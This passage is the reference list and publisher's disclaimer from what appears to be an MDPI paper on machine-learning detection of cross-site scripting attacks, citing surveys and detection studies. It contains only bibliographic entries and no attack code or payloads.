6. Parashar, P.; Srivastava, P. An Analysis of XSS Vulnerabilities and Prevention of XSS Attacks in Web Applications. Available online:
https://www.researchgate.net/publication/371724261_An_Analysis_of_XSS_Vulnerabilities_and_Prevention_of_XSS_Attacks_in_Web_Applications
(accessed on 3 January 2024).
7. Nir, O. “OWASP Top Ten 2023—The Complete Guide”, Reflectiz. Available online: https://www.reflectiz.com/blog/owasp-top-
ten-2023/ (accessed on 9 October 2023).
8. Kaur, J.; Garg, U.; Bathla, G. Detection of cross-site scripting (XSS) attacks using machine learning techniques: A review. Artif.
Intell. Rev. 2023, 56, 12725–12769. [CrossRef]
9. Edgescan. Vulnerability Statistics Snapshot. January 2022. Available online:
https://www.edgescan.com/january-2022-vulnerability-statistics-snapshot/ (accessed on 10 August 2023).
10. Erşahin, B.; Erşahin, M. Web application security. South Fla. J. Dev. 2022, 3, 4194–4203. [CrossRef]
11. Awad, M.; Ali, M.; Takruri, M.; Ismail, S. Security vulnerabilities related to web-based data. Telkomnika (Telecommun. Comput.
Electron. Control) 2019, 17, 852–856. [CrossRef]
12. Habibi, G.; Surantha, N. XSS Attack Detection with Machine Learning and n-Gram Methods; Institute of Electrical and Electronics
Engineers: Los Alamitos, CA, USA, 2020.
13. Sarker, I.H. Multi-aspects AI-based modeling and adversarial learning for cybersecurity intelligence and robustness: A
comprehensive overview. Secur. Priv. 2023, 6, e295. [CrossRef]
14. Stency, V.S.; Mohanasundaram, N. A Study on XSS Attacks: Intelligent Detection Methods. In Journal of Physics: Conference Series,
Volume 1767, International E-Conference on Data Analytics, Intelligent Systems and Information Security & ICDIIS 2020, Pollachi, India,
11–12 December 2020; IOP Publishing Ltd.: Bristol, UK, 2021. [CrossRef]
15. Marashdih, A.W.; Zaaba, Z.F.; Suwais, K.; Mohd, N.A. Web application security: An investigation on static analysis with other
algorithms to detect cross site scripting. Procedia Comput. Sci. 2019, 161, 1173–1181. [CrossRef]
16. Cheah, C.S.; Selvarajah, V. A Review of Common Web Application Breaching Techniques (SQLi, XSS, CSRF). In Proceedings of
the 3rd International Conference on Integrated Intelligent Computing Communication & Security (ICIIC 2021), Bangalore, India,
6–7 August 2021.
17. Liu, M.; Zhang, B.; Chen, W.; Zhang, X. A Survey of Exploitation and Detection Methods of XSS Vulnerabilities. IEEE Access 2019,
7, 182004–182016. [CrossRef]
18. Rodríguez, G.E.; Torres, J.G.; Flores, P.; Benavides, D.E. Cross-site scripting (XSS) attacks and mitigation: A survey. Comput. Netw.
2020, 166, 106960. [CrossRef]
19. Hickling, J. What Is DOM XSS and Why Should You Care? Comput. Fraud Secur. 2021, 4, 6–10. [CrossRef]
20. Panwar, P.; Mishra, H.; Patidar, R. An Analysis of the Prevention and Detection of Cross Site Scripting Attack. Int. J. Emerg. Trends
Eng. Res. 2023, 11, 30–34. [CrossRef]
21. Kascheev, S.; Olenchikova, T. The Detecting Cross-Site Scripting (XSS) Using Machine Learning Methods. In Proceedings of the
2020 Global Smart Industry Conference, GloSIC 2020, Chelyabinsk, Russia, 17–19 November 2020; Institute of Electrical and
Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020; pp. 265–270. [CrossRef]
22. Mokbal, F.M.M.; Dan, W.; Xiaoxi, W.; Wenbin, Z.; Lihua, F. XGBXSS: An Extreme Gradient Boosting Detection Framework for
Cross-Site Scripting Attacks Based on Hybrid Feature Selection Approach and Parameters Optimization. J. Inf. Secur. Appl. 2021,
58, 102813. [CrossRef]
23. Thajeel, I.K.; Samsudin, K.; Hashim, S.J.; Hashim, F. Machine and Deep Learning-based XSS Detection Approaches: A Systematic
Literature Review. J. King Saud Univ.—Comput. Inf. Sci. 2023, 35, 101628. [CrossRef]
24. Banerjee, R.; Baksi, A.; Singh, N.; Bishnu, S.K. Detection of XSS in web applications using Machine Learning Classifiers. In
Proceedings of the 2020 4th International Conference on Electronics, Materials Engineering and Nano-Technology, IEMENTech
2020, Kolkata, India, 2–4 October 2020; Institute of Electrical and Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020.
[CrossRef]
25. Gogoi, B.; Ahmed, T.; Saikia, H.K. Detection of XSS Attacks in Web Applications: A Machine Learning Approach. Int. J. Innov.
Res. Comput. Sci. Technol. 2021, 9, 1–10. [CrossRef]
26. Stiawan, D.; Bardadi, A.; Afifah, N.; Melinda, L.; Heryanto, A.; Septian, T.W.; Idris, M.Y.; Subroto, I.M.; Budiarto, R. An Improved
LSTM-PCA Ensemble Classifier for SQL Injection and XSS Attack Detection. Comput. Syst. Sci. Eng. 2023, 46, 1759–1774.
[CrossRef]
27. Kadhim, R.W.; Gaata, M.T. A hybrid of CNN and LSTM methods for securing web application against cross-site scripting attack.
Indones. J. Electr. Eng. Comput. Sci. 2020, 21, 1022–1029. [CrossRef]
28. Buz, B.; Gülçiçek, B.; Bahtiyar, Ş. A Hybrid Machine Learning Model to Detect Reflected XSS Attack. Balk. J. Electr. Comput. Eng.
2021, 9, 235–241. [CrossRef]
29. Melicher, W.; Fung, C.; Bauer, L.; Jia, L. Towards a lightweight, hybrid approach for detecting DOM XSS vulnerabilities with
machine learning. In Proceedings of the Web Conference 2021—Proceedings of the World Wide Web Conference, WWW 2021,
Ljubljana, Slovenia, 12–16 April 2021; Association for Computing Machinery, Inc.: New York, NY, USA, 2021; pp. 2684–2695.
[CrossRef]
30. Lamrani Alaoui, R.; Habib Nfaoui, E. Cross Site Scripting Attack Detection Approach Based on LSTM Encoder-Decoder and
Word Embeddings. 2023. Available online: www.ijisae.org (accessed on 13 June 2024).
31. Gupta, C.; Singh, R.K.; Mohapatra, A.K. GeneMiner: A Classification Approach for Detection of XSS Attacks on Web Services.
Comput. Intell. Neurosci. 2022, 2022, 3675821. [CrossRef]
32. Dawadi, B.R.; Adhikari, B.; Srivastava, D.K. Deep Learning Technique-Enabled Web Application Firewall for the Detection of
Web Attacks. Sensors 2023, 23, 2073. [CrossRef]
33. Tian, Z.; Luo, C.; Qiu, J.; Du, X.; Guizani, M. A Distributed Deep Learning System for Web Attack Detection on Edge Devices.
IEEE Trans. Ind. Inf. 2020, 16, 1963–1971. [CrossRef]
34. Chaudhary, P.; Gupta, B.B.; Chang, X.; Nedjah, N.; Chui, K.T. Enhancing big data security through integrating XSS scanner into
fog nodes for SMEs gain. Technol. Forecast. Soc. Chang. 2021, 168, 120754. [CrossRef]
35. Luo, C.; Tan, Z.; Min, G.; Gan, J.; Shi, W.; Tian, Z. A Novel Web Attack Detection System for Internet of Things via Ensemble
Classification. IEEE Trans. Ind. Inf. 2021, 17, 5810–5818. [CrossRef]
36. Odun-Ayo, I.; Toro-Abasi, W.; Adebiyi, M.; Alagbe, O. An implementation of real-time detection of cross-site scripting attacks on
cloud-based web applications using deep learning. Bull. Electr. Eng. Inform. 2021, 10, 2442–2453. [CrossRef]
37. Lei, L.; Chen, M.; He, C.; Li, D. XSS Detection Technology Based on LSTM-Attention. In Proceedings of the 2020 5th International
Conference on Control, Robotics and Cybernetics, CRC 2020, Wuhan, China, 16–18 October 2020; Institute of Electrical and
Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020; pp. 175–180. [CrossRef]
38. Tan, X.; Xu, Y.; Wu, T.; Li, B. Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Appl. Sci. 2023, 13, 7895.
[CrossRef]
39. Zhang, X.; Zhou, Y.; Pei, S.; Zhuge, J.; Chen, J. Adversarial Examples Detection for XSS Attacks Based on Generative Adversarial
Networks. IEEE Access 2020, 8, 10989–10996. [CrossRef]
40. Alaoui, R.L.; Nfaoui, E.H. Generative Adversarial Network-Based Approach for Automated Generation of Adversarial Attacks
Against a Deep-Learning Based XSS Attack Detection Model. 2023. Available online: www.ijacsa.thesai.org (accessed on
13 June 2024).
41. Tariq, I.; Sindhu, M.A.; Abbasi, R.A.; Khattak, A.S.; Maqbool, O.; Siddiqui, G.F. Resolving cross-site scripting attacks through
genetic algorithm and reinforcement learning. Expert Syst. Appl. 2021, 168, 114386. [CrossRef]
42. Thajeel, I.K.; Samsudin, K.; Hashim, S.J.; Hashim, F. Dynamic feature selection model for adaptive cross site scripting attack
detection using developed multi-agent deep Q learning model. J. King Saud Univ.—Comput. Inf. Sci. 2023, 35, 101490. [CrossRef]
43. Van Den Bergh, D.; van Doorn, J.; Marsman, M.; Draws, T.; van Kesteren, E.-J.; Derks, K.; Dablander, F.; Gronau, Q.F.; Kucharský,
Š.; Gupta, A.R.K.N.; et al. A tutorial on conducting and interpreting a bayesian ANOVA in JASP. Annee Psychol. 2020, 120, 73–96.
[CrossRef]
44. Omuya, E.O.; Okeyo, G.O.; Kimwele, M.W. Feature Selection for Classification using Principal Component Analysis and
Information Gain. Expert Syst. Appl. 2021, 174, 114765. [CrossRef]
45. Khyat, J.; Chitra, S. Feature Selection Methods for Improving Classification Accuracy-A Comparative Study. UGC Care Group I
Listed J. 2020, 10, 1.
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual
author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to
people or property resulting from any ideas, methods, instructions or products referred to in the content.